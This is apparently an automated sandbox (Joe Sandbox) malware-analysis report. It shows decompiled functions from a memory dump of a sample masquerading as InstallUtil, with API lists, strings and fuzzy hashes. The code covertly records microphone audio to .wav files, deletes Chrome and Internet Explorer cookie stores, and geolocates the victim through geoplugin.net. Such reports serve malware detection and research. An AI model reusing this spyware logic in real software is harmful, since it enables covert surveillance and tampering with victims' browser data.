							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00447542( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00447542();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E004318FB(_v8 ^ _t136);
			}

0x00446270
0x00446277
0x0044627a
0x00446282
0x00446286
0x00446292
0x00446295
0x00446298
0x0044629f
0x004462a7
0x004462aa
0x004462b0
0x004462b6
0x004462bb
0x004462bd
0x004462c0
0x004462c5
0x004462cf
0x004462d6
0x004462d9
0x004462e0
0x004462e7
0x00446313
0x00446339
0x0044633b
0x00000000
0x00446315
0x00446318
0x004463df
0x004463eb
0x004463f6
0x004463fb
0x0044631e
0x00446325
0x0044632a
0x00446330
0x00446336
0x00000000
0x00446336
0x00446330
0x00446318
0x004462e9
0x004462ed
0x004462f0
0x004462f6
0x004462f8
0x004462fb
0x004462ff
0x0044633c
0x0044633f
0x00446340
0x00446345
0x0044634b
0x00446351
0x00446360
0x00446366
0x0044636c
0x00446371
0x0044638d
0x00446400
0x00446406
0x0044638f
0x00446397
0x004463a0
0x004463a6
0x00000000
0x004463a8
0x004463aa
0x004463ad
0x004463c6
0x00000000
0x004463c8
0x004463cc
0x004463ce
0x004463d1
0x00000000
0x004463d1
0x004463cc
0x004463c6
0x004463a6
0x004463a0
0x0044638d
0x00446371
0x0044634b
0x00000000
0x004463d4
0x004463d4
0x00446408
0x0044641a

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004469DD,E*E,00000000,00000000,00000000,00000000,00000000), ref: 004462AA
__fassign.LIBCMT ref: 00446325
__fassign.LIBCMT ref: 00446340
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00446366
WriteFile.KERNEL32(?,00000000,00000000,004469DD,00000000,?,?,?,?,?,?,?,?,?,004469DD,E*E), ref: 00446385
WriteFile.KERNEL32(?,?,00000001,004469DD,00000000,?,?,?,?,?,?,?,?,?,004469DD,E*E), ref: 004463BE

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: be546d5b80fd31850e4204c9f880793145af66d9c0a13aeee3ca9cb7c26e5121
Instruction ID: a235659a9f502468bc65f8e5151e7be7100ddd5279af5669b7fc15fe4553dffd
Opcode Fuzzy Hash: be546d5b80fd31850e4204c9f880793145af66d9c0a13aeee3ca9cb7c26e5121
Instruction Fuzzy Hash: 9151E670E002599FDF10CFA8D885AEEBBF4EF0A310F15416BE951E7291E7349941CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401CCB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401CCB(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* __ebp;
				void* _t29;
				intOrPtr _t43;
				void* _t76;
				void* _t79;

				_t47 = __ebx;
				_push(_t76);
				E00401F46(__ebx,  &_v228);
				_t84 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E004016C7();
					E004372A9( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016BF());
					E00402053(__ebx,  &_v204, __edx, _t79,  &_v84);
					_push(L".wav");
					_t29 = E00418385( &_v112,  &_v208);
					E00401ED3( &_v232, _t31, _t76, E00402FD4(_t47,  &_v184, E00402F65( &_v160, E00402F32(__ebx,  &_v136, 0x46e0d8, _t79), 0x5c), __edi, _t79, _t84, _t29));
					E00401EC9();
					E00401EC9();
					E00401EC9();
					E00401EC9();
					E00401F98();
					E00401A2D(E00401EC4( &_v236), 0x46da78);
					waveInUnprepareHeader( *0x46dab0, 0x46da78, 0x20);
					0x46da78->lpData = E00401F6B(0x46e0f0);
					_t43 =  *0x46dab4; // 0x0
					 *0x46da7c = _t43;
					 *0x46da80 = 0;
					 *0x46da84 = 0;
					 *0x46da88 = 0;
					 *0x46da8c = 0;
					waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
					waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
				}
				return E00401EC9();
			}

0x00401ccb
0x00401cdb
0x00401cdc
0x00401ce1
0x00401ce8
0x00401cf2
0x00401d10
0x00401d24
0x00401d29
0x00401d39
0x00401d6d
0x00401d76
0x00401d7f
0x00401d88
0x00401d94
0x00401d9d
0x00401db4
0x00401dc2
0x00401dd4
0x00401dd9
0x00401de5
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e0f
0x00401e0f
0x00401e22

APIs

_strftime.LIBCMT ref: 00401D10

Part of subcall function 00401A2D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401A99

waveInUnprepareHeader.WINMM(0046DA78,00000020,00000000,?), ref: 00401DC2
waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401E00
waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401E0F

Strings

.wav, xrefs: 00401D29
%Y-%m-%d %H.%M, xrefs: 00401D01

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 84bc6e54503e707830db59b7950651190d31527b3b6fb850da134365874809e9
Instruction ID: 6d34670a9c9501c55046bded0889d23817cdfc8ec21eae78461e7117aeba614b
Opcode Fuzzy Hash: 84bc6e54503e707830db59b7950651190d31527b3b6fb850da134365874809e9
Instruction Fuzzy Hash: 23318F71A1C3409BC314EB62DC56A9E77E8AB85308F00493EF545A21F2FF789909CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A57D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040A57D(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;
				void* _t63;

				_t42 =  &_v28;
				E0040209F(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E00410B1D( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t63 = _t62 + 0xc;
				E00401FA2( &_v28, 0x80000001, _t59, _t17);
				E00401F98();
				_t58 = 0x461084;
				_t20 = E00405ADC(0x461084);
				_t67 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(E00401F6B( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402053(0,  &_v52, 0x461084, _t61,  &_v340);
						_t58 =  &_v52;
						_t34 = E004187B1(E00401EC4(E00418385( &_v76,  &_v52)),  &_v52);
						E00401EC9();
						_t55 =  &_v52;
						E00401F98();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0040A885();
							if(__eflags != 0) {
								_t41 = 1;
								E00402053(1, _t63 - 0x18,  &_v52, _t61, "\n[IE cookies cleared!]");
								E0040A863(1,  &_v52, _t61, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t63 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t63 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402053(_t41, _t48, _t58, _t61);
					E0040A863(_t41, _t58, _t61, _t67);
					_t41 = 1;
					L8:
				}
				E00401F98();
				return _t41;
			}

0x0040a586
0x0040a58b
0x0040a590
0x0040a5a3
0x0040a5a5
0x0040a5aa
0x0040a5b1
0x0040a5b9
0x0040a5be
0x0040a5c6
0x0040a5cb
0x0040a5cd
0x0040a5ff
0x0040a612
0x0040a614
0x00000000
0x0040a616
0x0040a620
0x0040a625
0x0040a639
0x0040a643
0x0040a648
0x0040a64b
0x0040a650
0x0040a652
0x0040a663
0x0040a664
0x0040a66a
0x0040a66c
0x0040a671
0x0040a67a
0x0040a67f
0x00000000
0x0040a67f
0x0040a654
0x0040a657
0x0040a659
0x00000000
0x0040a659
0x0040a652
0x0040a5cf
0x0040a5cf
0x0040a5d2
0x0040a5d4
0x0040a5d9
0x0040a5d9
0x0040a5de
0x0040a5e3
0x0040a684
0x0040a684
0x0040a68a
0x0040a696

APIs

Part of subcall function 00410B1D: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410B3F
Part of subcall function 00410B1D: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410B5E
Part of subcall function 00410B1D: RegCloseKey.ADVAPI32(?), ref: 00410B67

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A5FF
PathFileExistsA.SHLWAPI(?), ref: 0040A60C

Strings

[IE cookies not found], xrefs: 0040A5D4
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A596
Cookies, xrefs: 0040A591
[IE cookies cleared!], xrefs: 0040A659, 0040A675

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 1ec087e9c9ca0ad8f87221c3579e362c13ac60d1150911bbf2b037922f98a7ec
Instruction ID: 4e5e9a138df1b669ebb71f0538ebc1637bd796b586e3e66ccfb6a03cfb0eb856
Opcode Fuzzy Hash: 1ec087e9c9ca0ad8f87221c3579e362c13ac60d1150911bbf2b037922f98a7ec
Instruction Fuzzy Hash: 7021A231A002196ACB04F7B2CC579EE7368AF11348F48056FB901B72D2EF7D594AC69A

Uniqueness

Uniqueness Score: -1.00%

Function 004528BD Relevance: 10.6, APIs: 7, Instructions: 80
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E004528BD(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00444621(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E004421F7(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0043990B(GetLastError());
								}
							}
							E004427C2(_t40);
							_t14 = _t35;
						} else {
							E0043990B(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00439941())) = 0x16;
						E0043862C();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00439941())) = 0x16;
				E0043862C();
				return 0;
			}

0x004528c2
0x004528c7
0x004528e1
0x004528e4
0x004528e6
0x004528ff
0x00452901
0x00452908
0x0045290a
0x00452913
0x00452914
0x00452918
0x0045291e
0x00452921
0x00452923
0x0045293d
0x00452940
0x00452942
0x0045294f
0x00452955
0x00452957
0x0045296b
0x0045296d
0x00452971
0x00452971
0x00452972
0x00452959
0x00452960
0x00452965
0x00452957
0x00452975
0x0045297a
0x00452925
0x0045292c
0x00452931
0x00452931
0x004528e8
0x004528ed
0x004528f3
0x004528f8
0x004528f8
0x00000000
0x0045297f
0x004528ce
0x004528d4
0x00000000

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 011221dc8e44fe761cbe672143520de27385273c876fa82623a1b2dc9ad6cc1c
Instruction ID: 139e041b0b33700c4d36bf1185964b58ea7e57f9df006e1bc172c4f7181bddef
Opcode Fuzzy Hash: 011221dc8e44fe761cbe672143520de27385273c876fa82623a1b2dc9ad6cc1c
Instruction Fuzzy Hash: 4E112BB26042157BDB202FB78C05A6B7A68EFC776AF10065FFC15C6352DAB888418669

Uniqueness

Uniqueness Score: -1.00%

Function 00417B93 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00417B93(void* __ecx, void* __edx) {
				WCHAR* _v36;
				long _v80;
				char _v88;
				int _v92;
				intOrPtr _v96;
				void* _v100;
				int _v104;
				intOrPtr _v108;
				void* __ebx;
				void* __ebp;
				int _t16;
				void* _t24;
				intOrPtr _t27;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t37;

				_t32 = __edx;
				_t25 = __ecx;
				_t24 = __ecx;
				E0040209F(__ecx, __ecx);
				_push(0xffff);
				_v36 = 0;
				_t33 = E00438691(_t25);
				_t37 = InternetOpenW(0, 1, 0, 0, 0);
				_t35 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0);
				do {
					_v80 = _v80 & 0x00000000;
					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80);
					_t27 = _v96;
					_v92 = _t16;
					_t40 = _t27;
					if(_t27 != 0) {
						L00403336(E00402077(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
						E00401F98();
						_t27 = _v108;
						_t16 = _v104;
					}
				} while (_t16 == 1 && _t27 != 0);
				InternetCloseHandle(_t35);
				InternetCloseHandle(_t37);
				L0043868C(_t33);
				return _t24;
			}

0x00417b93
0x00417b93
0x00417b9a
0x00417b9c
0x00417ba3
0x00417ba8
0x00417bb8
0x00417bc8
0x00417bd6
0x00417bd8
0x00417bd8
0x00417be9
0x00417bef
0x00417bf3
0x00417bf7
0x00417bf9
0x00417c09
0x00417c12
0x00417c17
0x00417c1b
0x00417c1b
0x00417c1f
0x00417c2f
0x00417c32
0x00417c35
0x00417c44

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417BBA
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00417BD0
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00417BE9
InternetCloseHandle.WININET(00000000), ref: 00417C2F
InternetCloseHandle.WININET(00000000), ref: 00417C32

Strings

http://geoplugin.net/json.gp, xrefs: 00417BCA

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: bdd3461025a07f4ab0c6adfcab2befc2b025bc62e3f9970a7a9e01657d32a828
Instruction ID: a985d038e5e821fb03fe24fa03f10acd68b0a5cf2d9b78d649052a39aa07e125
Opcode Fuzzy Hash: bdd3461025a07f4ab0c6adfcab2befc2b025bc62e3f9970a7a9e01657d32a828
Instruction Fuzzy Hash: 4611C8312093127BD224AF169C49DAB7FECEF85769F00043EF905A2191DB6C9844C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 0044CC6B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044CC6B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E0044C9B2(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x26
					E0044C9B2(_t2, 7);
					_t3 = _t45 + 0x38; // 0x42
					E0044C9B2(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x72
					E0044C9B2(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0xa2
					E0044C9B2(_t5, 2);
					E004427C2( *((intOrPtr*)(_t45 + 0xa0)));
					E004427C2( *((intOrPtr*)(_t45 + 0xa4)));
					E004427C2( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xbe
					E0044C9B2(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xda
					E0044C9B2(_t10, 7);
					_t11 = _t45 + 0xec; // 0xf6
					E0044C9B2(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x126
					E0044C9B2(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x156
					E0044C9B2(_t13, 2);
					E004427C2( *((intOrPtr*)(_t45 + 0x154)));
					E004427C2( *((intOrPtr*)(_t45 + 0x158)));
					E004427C2( *((intOrPtr*)(_t45 + 0x15c)));
					return E004427C2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0044cc71
0x0044cc76
0x0044cc7f
0x0044cc84
0x0044cc8a
0x0044cc8f
0x0044cc95
0x0044cc9a
0x0044cca0
0x0044cca5
0x0044ccae
0x0044ccb9
0x0044ccc4
0x0044cccf
0x0044ccd4
0x0044ccdd
0x0044cce2
0x0044cceb
0x0044ccf3
0x0044ccfc
0x0044cd01
0x0044cd0a
0x0044cd0f
0x0044cd18
0x0044cd23
0x0044cd2e
0x0044cd39
0x00000000
0x0044cd49
0x0044cd4e

APIs

Part of subcall function 0044C9B2: _free.LIBCMT ref: 0044C9DB

_free.LIBCMT ref: 0044CCB9

Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA

_free.LIBCMT ref: 0044CCC4
_free.LIBCMT ref: 0044CCCF
_free.LIBCMT ref: 0044CD23
_free.LIBCMT ref: 0044CD2E
_free.LIBCMT ref: 0044CD39
_free.LIBCMT ref: 0044CD44

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1b44e874dceb31798a0f9e41914d974621cbef83765b8e07f2035fdd4be1358a
Instruction ID: 0cdbdbbf2addcad117c93b4af5572a357e99c5b513e924f7da436f6b735f60b6
Opcode Fuzzy Hash: 1b44e874dceb31798a0f9e41914d974621cbef83765b8e07f2035fdd4be1358a
Instruction Fuzzy Hash: 73114FB1642B04BAF560BBB2CC87FDB779CEF00704F844C1FB29A66052EA6DB9458754

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECED Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040ECED(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t42;
				intOrPtr* _t44;

				E00431C0B( &_v12, 0);
				_t39 =  *0x46fdac;
				_v8 = _t39;
				_t42 = E0040BBB2(_a4, E0040BAE1(0x46ffa0));
				if(_t42 != 0) {
					L5:
					E00431C63( &_v12);
					return _t42;
				} else {
					if(_t39 == 0) {
						__eflags = E0040EDB1(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t9 =  &_v24; // 0x40e664
							_t34 = _t9;
							E0040B9AD(_t34);
							_t10 =  &_v24; // 0x40e664
							E00435A36(_t10, 0x46969c);
							asm("int3");
							_push(_t42);
							_t44 = _t34;
							E0040B8A7(_t34, _v36);
							 *_t44 = 0x4552d0;
							return _t44;
						} else {
							_t42 = _v8;
							 *0x46fdac = _t42;
							 *((intOrPtr*)( *_t42 + 4))();
							E00431E1C(__eflags, _t42);
							goto L5;
						}
					} else {
						_t42 = _t39;
						goto L5;
					}
				}
			}

0x0040ecfa
0x0040ecff
0x0040ed0a
0x0040ed1b
0x0040ed1f
0x0040ed53
0x0040ed56
0x0040ed62
0x0040ed21
0x0040ed23
0x0040ed37
0x0040ed3a
0x0040ed63
0x0040ed63
0x0040ed66
0x0040ed70
0x0040ed74
0x0040ed79
0x0040ed7a
0x0040ed7f
0x0040ed81
0x0040ed86
0x0040ed8f
0x0040ed3c
0x0040ed3c
0x0040ed41
0x0040ed49
0x0040ed4d
0x00000000
0x0040ed52
0x0040ed25
0x0040ed25
0x00000000
0x0040ed25
0x0040ed23

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040ECFA
int.LIBCPMT ref: 0040ED0D

Part of subcall function 0040BAE1: std::_Lockit::_Lockit.LIBCPMT ref: 0040BAF2
Part of subcall function 0040BAE1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BB0C

std::_Facet_Register.LIBCPMT ref: 0040ED4D
std::_Lockit::~_Lockit.LIBCPMT ref: 0040ED56
__CxxThrowException@8.LIBVCRUNTIME ref: 0040ED74

Strings

d@, xrefs: 0040ED63, 0040ED70, 0040ED73

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: d@
API String ID: 2536120697-3443089334
Opcode ID: 34f1fb9562de7cf1d4cf39434dbbd2c72b799665a8e84ee754ab694f2ae99334
Instruction ID: c88102f2fc14dc4e949a375741808ed2cb2f2b99988b4f8521d55b5ae153e81e
Opcode Fuzzy Hash: 34f1fb9562de7cf1d4cf39434dbbd2c72b799665a8e84ee754ab694f2ae99334
Instruction Fuzzy Hash: 0811C132900115ABCB10BBA6E84189EBB78DF84324F10457FF845A72E1EB789E018BCD

Uniqueness

Uniqueness Score: -1.00%

Function 00436C97 Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00436C97(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46c090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00435718(__eflags,  *0x46c090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00435752(__eflags,  *0x46c090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E00441BB3(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00435752(__eflags,  *0x46c090, 0);
								} else {
									__eflags = E00435752(__eflags,  *0x46c090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004427C2(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x00436c9e
0x00436cb1
0x00436cb8
0x00436cbb
0x00436cbe
0x00436cd7
0x00436cd7
0x00436cc0
0x00436cc0
0x00436cc2
0x00436ccc
0x00436cd2
0x00436cd3
0x00436cd5
0x00436ce5
0x00436ce9
0x00436ceb
0x00436cff
0x00436cff
0x00436d08
0x00436ced
0x00436cfb
0x00436cfd
0x00436d11
0x00436d13
0x00436d13
0x00000000
0x00000000
0x00000000
0x00436cfd
0x00436d16
0x00000000
0x00000000
0x00000000
0x00436cd5
0x00436cc2
0x00436d1e
0x00436d28
0x00436ca0
0x00436ca2
0x00436ca2

APIs

GetLastError.KERNEL32(?,?,00436C8E,00435BCE), ref: 00436CA5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00436CB3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00436CCC
SetLastError.KERNEL32(00000000,?,00436C8E,00435BCE), ref: 00436D1E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 340dec9bad919ad146e11d0d3378a8005c767dfedaf6d62dffeb65ea64cab27a
Instruction ID: afa554c1e68ac18853916ae9bddde49054fb155561a47c4889e0264719c4959e
Opcode Fuzzy Hash: 340dec9bad919ad146e11d0d3378a8005c767dfedaf6d62dffeb65ea64cab27a
Instruction Fuzzy Hash: 5301F132208713AEA61427B96CC5A272684EB0977DF31623FF628452E1EF9948415A4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A135 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A135(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = E00402053(_t20,  &_v52, __edx, _t33, E00438A1A(_t20, __eflags, "UserProfile"));
				E0040793B(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00401F98();
				if(DeleteFileA(E00401F6B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402053(_t20, _t28, _t31, _t33);
						E0040A863(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401F98();
				return _t21;
			}

0x0040a135
0x0040a135
0x0040a155
0x0040a15a
0x0040a163
0x0040a179
0x0040a19f
0x0040a1a1
0x00000000
0x0040a17b
0x0040a182
0x0040a185
0x0040a193
0x0040a195
0x0040a1a6
0x0040a1a6
0x0040a1ab
0x0040a1b0
0x0040a18c
0x0040a18c
0x0040a18c
0x0040a185
0x0040a1b8
0x0040a1c3

APIs

